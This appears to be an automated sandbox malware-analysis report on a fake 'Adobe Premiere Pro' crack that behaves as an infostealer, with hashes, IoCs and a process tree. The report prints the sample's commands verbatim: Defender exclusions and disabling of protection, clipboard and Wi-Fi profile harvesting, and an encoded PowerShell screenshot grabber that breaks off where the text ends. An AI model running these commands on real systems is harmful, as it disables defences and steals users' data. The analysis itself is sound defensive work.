Overview
overview
8Static
static
1Celex-Crack-main.zip
windows7-x64
1Celex-Crack-main.zip
windows10-2004-x64
1Celex-Crac...ro.exe
windows7-x64
7Celex-Crac...ro.exe
windows10-2004-x64
8stub-o.pyc
windows7-x64
3stub-o.pyc
windows10-2004-x64
3Celex-Crac...SE.txt
windows7-x64
1Celex-Crac...SE.txt
windows10-2004-x64
1Celex-Crac...DME.md
windows7-x64
3Celex-Crac...DME.md
windows10-2004-x64
3Resubmissions
26-05-2024 13:42
240526-qz4s7age6w 8Analysis
-
max time kernel
142s -
max time network
112s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
26-05-2024 13:42
Static task
static1
Behavioral task
behavioral1
Sample
Celex-Crack-main.zip
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Celex-Crack-main.zip
Resource
win10v2004-20240426-en
Behavioral task
behavioral3
Sample
Celex-Crack-main/Adobe_Premiere_Pro.exe
Resource
win7-20240508-en
Behavioral task
behavioral4
Sample
Celex-Crack-main/Adobe_Premiere_Pro.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral5
Sample
stub-o.pyc
Resource
win7-20231129-en
Behavioral task
behavioral6
Sample
stub-o.pyc
Resource
win10v2004-20240508-en
Behavioral task
behavioral7
Sample
Celex-Crack-main/LICENSE.txt
Resource
win7-20231129-en
Behavioral task
behavioral8
Sample
Celex-Crack-main/LICENSE.txt
Resource
win10v2004-20240508-en
Behavioral task
behavioral9
Sample
Celex-Crack-main/README.md
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
Celex-Crack-main/README.md
Resource
win10v2004-20240508-en
General
-
Target
Celex-Crack-main/Adobe_Premiere_Pro.exe
-
Size
7.9MB
-
MD5
afe4dadf636a6fa80f3741b5fa1016db
-
SHA1
645cf17883b7c6b03cfa802b4490c33111f25113
-
SHA256
1ac3aa61430be26964ecefb673cb580d3a97ef45ebc54670a7527e9a03759bdb
-
SHA512
9c1ec3a4d4a43ad052b2bf1e8d7c51e679f614e9cc48db02c75474704a47d26409093efdd31e0a0e70706c647635b2ad3e771ab761ad7be9d22eb569748afc9b
-
SSDEEP
196608:HM5Qsg5OQDbT/9bvLz3S1bA329OqtolYHCL:Ug5OQDbTlj3S1bO29OqtCjL
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4612 powershell.exe 3868 powershell.exe 1340 powershell.exe 2904 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 3740 bound.exe 2692 rar.exe -
Loads dropped DLL 18 IoCs
pid Process 1996 Adobe_Premiere_Pro.exe 1996 Adobe_Premiere_Pro.exe 1996 Adobe_Premiere_Pro.exe 1996 Adobe_Premiere_Pro.exe 1996 Adobe_Premiere_Pro.exe 1996 Adobe_Premiere_Pro.exe 1996 Adobe_Premiere_Pro.exe 1996 Adobe_Premiere_Pro.exe 1996 Adobe_Premiere_Pro.exe 1996 Adobe_Premiere_Pro.exe 1996 Adobe_Premiere_Pro.exe 1996 Adobe_Premiere_Pro.exe 1996 Adobe_Premiere_Pro.exe 1996 Adobe_Premiere_Pro.exe 1996 Adobe_Premiere_Pro.exe 1996 Adobe_Premiere_Pro.exe 1996 Adobe_Premiere_Pro.exe 1996 Adobe_Premiere_Pro.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral4/files/0x000700000002343c-24.dat upx behavioral4/memory/1996-28-0x00007FF825B20000-0x00007FF826109000-memory.dmp upx behavioral4/files/0x0007000000023440-30.dat upx behavioral4/files/0x0007000000023430-32.dat upx behavioral4/memory/1996-36-0x00007FF839660000-0x00007FF839683000-memory.dmp upx behavioral4/memory/1996-35-0x00007FF839850000-0x00007FF839860000-memory.dmp upx behavioral4/files/0x000700000002343a-34.dat upx behavioral4/memory/1996-38-0x00007FF839840000-0x00007FF83984F000-memory.dmp upx behavioral4/files/0x0007000000023433-39.dat upx behavioral4/memory/1996-41-0x00007FF839600000-0x00007FF83962D000-memory.dmp upx behavioral4/files/0x000700000002342f-42.dat upx behavioral4/files/0x0007000000023436-44.dat upx behavioral4/memory/1996-45-0x00007FF8395E0000-0x00007FF8395F9000-memory.dmp upx behavioral4/memory/1996-48-0x00007FF8358B0000-0x00007FF8358D3000-memory.dmp upx behavioral4/files/0x000700000002343f-47.dat upx behavioral4/memory/1996-50-0x00007FF825750000-0x00007FF8258C7000-memory.dmp upx behavioral4/files/0x0007000000023435-51.dat upx behavioral4/files/0x000700000002343e-54.dat upx behavioral4/memory/1996-56-0x00007FF839830000-0x00007FF83983D000-memory.dmp upx behavioral4/memory/1996-55-0x00007FF839530000-0x00007FF839549000-memory.dmp upx behavioral4/files/0x0007000000023437-57.dat upx behavioral4/files/0x0007000000023439-59.dat upx behavioral4/files/0x000700000002343b-60.dat upx behavioral4/memory/1996-61-0x00007FF835850000-0x00007FF83587E000-memory.dmp upx behavioral4/memory/1996-63-0x00007FF835380000-0x00007FF835438000-memory.dmp upx behavioral4/memory/1996-68-0x00007FF8253D0000-0x00007FF825748000-memory.dmp upx behavioral4/memory/1996-66-0x00007FF825B20000-0x00007FF826109000-memory.dmp upx behavioral4/files/0x0007000000023432-70.dat upx behavioral4/memory/1996-72-0x00007FF835830000-0x00007FF835844000-memory.dmp upx behavioral4/files/0x0007000000023434-74.dat upx behavioral4/memory/1996-75-0x00007FF8395D0000-0x00007FF8395DD000-memory.dmp upx behavioral4/memory/1996-71-0x00007FF839660000-0x00007FF839683000-memory.dmp upx behavioral4/files/0x0007000000023441-81.dat upx behavioral4/files/0x0007000000023438-76.dat upx behavioral4/memory/1996-83-0x00007FF824E90000-0x00007FF824FAC000-memory.dmp upx behavioral4/memory/3740-87-0x00007FF6D29E0000-0x00007FF6D2C0C000-memory.dmp upx behavioral4/memory/1996-211-0x00007FF8358B0000-0x00007FF8358D3000-memory.dmp upx behavioral4/memory/1996-281-0x00007FF825750000-0x00007FF8258C7000-memory.dmp upx behavioral4/memory/1996-294-0x00007FF839530000-0x00007FF839549000-memory.dmp upx behavioral4/memory/1996-315-0x00007FF825B20000-0x00007FF826109000-memory.dmp upx behavioral4/memory/1996-331-0x00007FF835850000-0x00007FF83587E000-memory.dmp upx behavioral4/memory/1996-327-0x00007FF8253D0000-0x00007FF825748000-memory.dmp upx behavioral4/memory/1996-326-0x00007FF835380000-0x00007FF835438000-memory.dmp upx behavioral4/memory/1996-322-0x00007FF825750000-0x00007FF8258C7000-memory.dmp upx behavioral4/memory/1996-317-0x00007FF839660000-0x00007FF839683000-memory.dmp upx behavioral4/memory/1996-333-0x00007FF825B20000-0x00007FF826109000-memory.dmp upx behavioral4/memory/1996-356-0x00007FF825750000-0x00007FF8258C7000-memory.dmp upx behavioral4/memory/1996-364-0x00007FF824E90000-0x00007FF824FAC000-memory.dmp upx behavioral4/memory/1996-363-0x00007FF8395D0000-0x00007FF8395DD000-memory.dmp upx behavioral4/memory/1996-362-0x00007FF835830000-0x00007FF835844000-memory.dmp upx behavioral4/memory/1996-361-0x00007FF8253D0000-0x00007FF825748000-memory.dmp upx behavioral4/memory/1996-360-0x00007FF835380000-0x00007FF835438000-memory.dmp upx behavioral4/memory/1996-359-0x00007FF835850000-0x00007FF83587E000-memory.dmp upx behavioral4/memory/1996-358-0x00007FF839830000-0x00007FF83983D000-memory.dmp upx behavioral4/memory/1996-357-0x00007FF839530000-0x00007FF839549000-memory.dmp upx behavioral4/memory/1996-355-0x00007FF8358B0000-0x00007FF8358D3000-memory.dmp upx behavioral4/memory/1996-354-0x00007FF8395E0000-0x00007FF8395F9000-memory.dmp upx behavioral4/memory/1996-353-0x00007FF839600000-0x00007FF83962D000-memory.dmp upx behavioral4/memory/1996-352-0x00007FF839840000-0x00007FF83984F000-memory.dmp upx behavioral4/memory/1996-351-0x00007FF839660000-0x00007FF839683000-memory.dmp upx behavioral4/memory/1996-350-0x00007FF839850000-0x00007FF839860000-memory.dmp upx behavioral4/memory/1996-349-0x00007FF825B20000-0x00007FF826109000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 30 discord.com 33 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 28 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2260 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 1420 tasklist.exe 4240 tasklist.exe 3284 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 1852 systeminfo.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1364 reg.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 4612 powershell.exe 4612 powershell.exe 3868 powershell.exe 1340 powershell.exe 3924 powershell.exe 3868 powershell.exe 1340 powershell.exe 1340 powershell.exe 3924 powershell.exe 4504 powershell.exe 4504 powershell.exe 4504 powershell.exe 2904 powershell.exe 2904 powershell.exe 2904 powershell.exe 2688 powershell.exe 2688 powershell.exe 2632 powershell.exe 2632 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 2368 powershell.exe 2368 powershell.exe 2368 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4612 powershell.exe Token: SeDebugPrivilege 3868 powershell.exe Token: SeDebugPrivilege 1340 powershell.exe Token: SeDebugPrivilege 3924 powershell.exe Token: SeDebugPrivilege 1420 tasklist.exe Token: SeDebugPrivilege 4240 tasklist.exe Token: SeIncreaseQuotaPrivilege 2812 WMIC.exe Token: SeSecurityPrivilege 2812 WMIC.exe Token: SeTakeOwnershipPrivilege 2812 WMIC.exe Token: SeLoadDriverPrivilege 2812 WMIC.exe Token: SeSystemProfilePrivilege 2812 WMIC.exe Token: SeSystemtimePrivilege 2812 WMIC.exe Token: SeProfSingleProcessPrivilege 2812 WMIC.exe Token: SeIncBasePriorityPrivilege 2812 WMIC.exe Token: SeCreatePagefilePrivilege 2812 WMIC.exe Token: SeBackupPrivilege 2812 WMIC.exe Token: SeRestorePrivilege 2812 WMIC.exe Token: SeShutdownPrivilege 2812 WMIC.exe Token: SeDebugPrivilege 2812 WMIC.exe Token: SeSystemEnvironmentPrivilege 2812 WMIC.exe Token: SeRemoteShutdownPrivilege 2812 WMIC.exe Token: SeUndockPrivilege 2812 WMIC.exe Token: SeManageVolumePrivilege 2812 WMIC.exe Token: 33 2812 WMIC.exe Token: 34 2812 WMIC.exe Token: 35 2812 WMIC.exe Token: 36 2812 WMIC.exe Token: SeDebugPrivilege 4504 powershell.exe Token: SeDebugPrivilege 3284 tasklist.exe Token: SeIncreaseQuotaPrivilege 2812 WMIC.exe Token: SeSecurityPrivilege 2812 WMIC.exe Token: SeTakeOwnershipPrivilege 2812 WMIC.exe Token: SeLoadDriverPrivilege 2812 WMIC.exe Token: SeSystemProfilePrivilege 2812 WMIC.exe Token: SeSystemtimePrivilege 2812 WMIC.exe Token: SeProfSingleProcessPrivilege 2812 WMIC.exe Token: SeIncBasePriorityPrivilege 2812 WMIC.exe Token: SeCreatePagefilePrivilege 2812 WMIC.exe Token: SeBackupPrivilege 2812 WMIC.exe Token: SeRestorePrivilege 2812 WMIC.exe Token: SeShutdownPrivilege 2812 WMIC.exe Token: SeDebugPrivilege 2812 WMIC.exe Token: SeSystemEnvironmentPrivilege 2812 WMIC.exe Token: SeRemoteShutdownPrivilege 2812 WMIC.exe Token: SeUndockPrivilege 2812 WMIC.exe Token: SeManageVolumePrivilege 2812 WMIC.exe Token: 33 2812 WMIC.exe Token: 34 2812 WMIC.exe Token: 35 2812 WMIC.exe Token: 36 2812 WMIC.exe Token: SeDebugPrivilege 2904 powershell.exe Token: SeDebugPrivilege 2688 powershell.exe Token: SeDebugPrivilege 2632 powershell.exe Token: SeIncreaseQuotaPrivilege 4572 WMIC.exe Token: SeSecurityPrivilege 4572 WMIC.exe Token: SeTakeOwnershipPrivilege 4572 WMIC.exe Token: SeLoadDriverPrivilege 4572 WMIC.exe Token: SeSystemProfilePrivilege 4572 WMIC.exe Token: SeSystemtimePrivilege 4572 WMIC.exe Token: SeProfSingleProcessPrivilege 4572 WMIC.exe Token: SeIncBasePriorityPrivilege 4572 WMIC.exe Token: SeCreatePagefilePrivilege 4572 WMIC.exe Token: SeBackupPrivilege 4572 WMIC.exe Token: SeRestorePrivilege 4572 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2684 wrote to memory of 1996 2684 Adobe_Premiere_Pro.exe 85 PID 2684 wrote to memory of 1996 2684 Adobe_Premiere_Pro.exe 85 PID 1996 wrote to memory of 3944 1996 Adobe_Premiere_Pro.exe 89 PID 1996 wrote to memory of 3944 1996 Adobe_Premiere_Pro.exe 89 PID 1996 wrote to memory of 3640 1996 Adobe_Premiere_Pro.exe 90 PID 1996 wrote to memory of 3640 1996 Adobe_Premiere_Pro.exe 90 PID 1996 wrote to memory of 4584 1996 Adobe_Premiere_Pro.exe 91 PID 1996 wrote to memory of 4584 1996 Adobe_Premiere_Pro.exe 91 PID 1996 wrote to memory of 4168 1996 Adobe_Premiere_Pro.exe 92 PID 1996 wrote to memory of 4168 1996 Adobe_Premiere_Pro.exe 92 PID 1996 wrote to memory of 3580 1996 Adobe_Premiere_Pro.exe 94 PID 1996 wrote to memory of 3580 1996 Adobe_Premiere_Pro.exe 94 PID 4584 wrote to memory of 4612 4584 cmd.exe 99 PID 4584 wrote to memory of 4612 4584 cmd.exe 99 PID 4168 wrote to memory of 3740 4168 cmd.exe 100 PID 4168 wrote to memory of 3740 4168 cmd.exe 100 PID 3944 wrote to memory of 3868 3944 cmd.exe 101 PID 3944 wrote to memory of 3868 3944 cmd.exe 101 PID 3640 wrote to memory of 3924 3640 cmd.exe 102 PID 3640 wrote to memory of 3924 3640 cmd.exe 102 PID 3580 wrote to memory of 1340 3580 cmd.exe 103 PID 3580 wrote to memory of 1340 3580 cmd.exe 103 PID 1996 wrote to memory of 4048 1996 Adobe_Premiere_Pro.exe 104 PID 1996 wrote to memory of 4048 1996 Adobe_Premiere_Pro.exe 104 PID 1996 wrote to memory of 1696 1996 Adobe_Premiere_Pro.exe 105 PID 1996 wrote to memory of 1696 1996 Adobe_Premiere_Pro.exe 105 PID 1996 wrote to memory of 3152 1996 Adobe_Premiere_Pro.exe 106 PID 1996 wrote to memory of 3152 1996 Adobe_Premiere_Pro.exe 106 PID 4048 wrote to memory of 1420 4048 cmd.exe 110 PID 4048 wrote to memory of 1420 4048 cmd.exe 110 PID 1696 wrote to memory of 4240 1696 cmd.exe 111 PID 1696 wrote to memory of 4240 1696 cmd.exe 111 PID 3152 wrote to memory of 1364 3152 cmd.exe 112 PID 3152 wrote to memory of 1364 3152 cmd.exe 112 PID 1996 wrote to memory of 4396 1996 Adobe_Premiere_Pro.exe 113 PID 1996 wrote to memory of 4396 1996 Adobe_Premiere_Pro.exe 113 PID 1996 wrote to memory of 4876 1996 Adobe_Premiere_Pro.exe 115 PID 1996 wrote to memory of 4876 1996 Adobe_Premiere_Pro.exe 115 PID 1996 wrote to memory of 5100 1996 Adobe_Premiere_Pro.exe 116 PID 1996 wrote to memory of 5100 1996 Adobe_Premiere_Pro.exe 116 PID 1996 wrote to memory of 5104 1996 Adobe_Premiere_Pro.exe 118 PID 1996 wrote to memory of 5104 1996 Adobe_Premiere_Pro.exe 118 PID 4876 wrote to memory of 4504 4876 cmd.exe 123 PID 4876 wrote to memory of 4504 4876 cmd.exe 123 PID 4396 wrote to memory of 2812 4396 cmd.exe 124 PID 4396 wrote to memory of 2812 4396 cmd.exe 124 PID 1996 wrote to memory of 1316 1996 Adobe_Premiere_Pro.exe 125 PID 1996 wrote to memory of 1316 1996 Adobe_Premiere_Pro.exe 125 PID 1996 wrote to memory of 1800 1996 Adobe_Premiere_Pro.exe 126 PID 1996 wrote to memory of 1800 1996 Adobe_Premiere_Pro.exe 126 PID 1996 wrote to memory of 4352 1996 Adobe_Premiere_Pro.exe 127 PID 1996 wrote to memory of 4352 1996 Adobe_Premiere_Pro.exe 127 PID 5100 wrote to memory of 3284 5100 cmd.exe 130 PID 5100 wrote to memory of 3284 5100 cmd.exe 130 PID 5104 wrote to memory of 4912 5104 cmd.exe 131 PID 5104 wrote to memory of 4912 5104 cmd.exe 131 PID 1996 wrote to memory of 3956 1996 Adobe_Premiere_Pro.exe 133 PID 1996 wrote to memory of 3956 1996 Adobe_Premiere_Pro.exe 133 PID 1316 wrote to memory of 3480 1316 cmd.exe 135 PID 1316 wrote to memory of 3480 1316 cmd.exe 135 PID 1996 wrote to memory of 4612 1996 Adobe_Premiere_Pro.exe 136 PID 1996 wrote to memory of 4612 1996 Adobe_Premiere_Pro.exe 136 PID 1800 wrote to memory of 1976 1800 cmd.exe 162 PID 1800 wrote to memory of 1976 1800 cmd.exe 162
Processes
-
C:\Users\Admin\AppData\Local\Temp\Celex-Crack-main\Adobe_Premiere_Pro.exe"C:\Users\Admin\AppData\Local\Temp\Celex-Crack-main\Adobe_Premiere_Pro.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Users\Admin\AppData\Local\Temp\Celex-Crack-main\Adobe_Premiere_Pro.exe"C:\Users\Admin\AppData\Local\Temp\Celex-Crack-main\Adobe_Premiere_Pro.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Celex-Crack-main\Adobe_Premiere_Pro.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:3944 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Celex-Crack-main\Adobe_Premiere_Pro.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"3⤵
- Suspicious use of WriteProcessMemory
PID:3640 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4584 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4168 -
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe4⤵
- Executes dropped EXE
PID:3740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1340
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"3⤵
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall4⤵
- Modifies registry key
PID:1364
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:4396 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Suspicious use of WriteProcessMemory
PID:4876 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:5104 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:4912
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵PID:3480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe" /v DisplayIcon"3⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe" /v DisplayIcon4⤵PID:1976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:4352
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:1852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAc